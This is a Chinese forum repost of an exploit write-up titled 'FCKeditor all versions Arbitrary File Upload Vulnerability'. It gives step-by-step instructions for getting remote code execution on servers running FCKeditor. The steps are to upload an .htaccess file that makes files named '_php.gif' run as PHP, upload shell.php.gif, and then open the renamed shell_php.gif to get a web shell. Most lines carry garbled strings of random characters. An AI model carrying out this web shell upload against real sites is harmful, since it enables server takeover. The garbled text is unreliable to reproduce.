FCKeditor所有php版本Upload上传漏洞
- B1 y1 b8 ?! F8 y0 [" f$ _3 f作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
3 M/ k% n( d3 Q3 D3 U7 R; V减小字体 增大字体- l$ \# Y/ y. r
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
' k6 a9 M8 V7 g# n# A, t[+] Date: 20114 j9 t+ f& p; B u0 X- b2 r$ m
[+] Author : sinesafe.cn& ?3 B% A# I' k& ~
[+] Website : WwW.sinesafe.cn
6 R* P B; M% V9 C6 D0 ]———————————————————
9 r! Y/ a. E7 C$ J3 \5 V1.create a htaccess file:7 V+ R1 y2 n$ n, O% e
code:; f9 A3 I& S, s5 X
<FilesMatch “_php.gif”>2 o/ P2 F4 D" }$ y9 T/ w7 H4 z
SetHandler application/x-httpd-php
/ [& P$ A5 G( P% P2 y4 f, T! X5 J</FilesMatch>% n5 [( F7 X3 X& ~
9 q( ^# y& Q. p9 B" C" v0 B% M' |! v, F2 n
2.Now upload this htaccess with FCKeditor.9 V' x4 {. }4 W. S4 y3 ^
; Y {" R+ g* Shttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
2 u+ k+ n/ w+ d% H( Z; b: e0 j \& S
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
7 w# Y0 W! a8 T$ `
5 f( x& s/ S# s/ v———————————————————————————————-" s# v- h7 V3 h
3.Now upload shell.php.gif with FCKeditor.) M1 ^. C! \1 `4 ? f! B
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.% H1 c F$ ^% H& G: Y$ S# g! n9 w9 |
5.http://www.sinesafe.cn/anything/shell_php.gif
3 H C/ @ w; q( p) ^6.Now shell is available from server. |
; |7 C$ m" ^5 P. h- a
6 F3 o* B/ ?3 M/ _0 i' T
U) l3 L7 d' O; |3 u2 f' M& ] |
发表于 2013-10-27 17:25:21
收藏
支持
反对